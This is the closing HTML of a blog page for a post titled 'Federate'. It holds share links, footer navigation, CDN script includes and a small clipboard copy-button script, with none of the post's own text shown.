  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2025/09/01/Federate/&title=Federate"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2025/09/01/Federate/&title=Federate"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2025/09/01/Federate/&title=Federate"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2025/09/01/Federate/&title=Federate"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2025/09/01/Federate/&name=Federate&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2025/09/01/Federate/&t=Federate"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2025
    Cain
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/links/">links</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
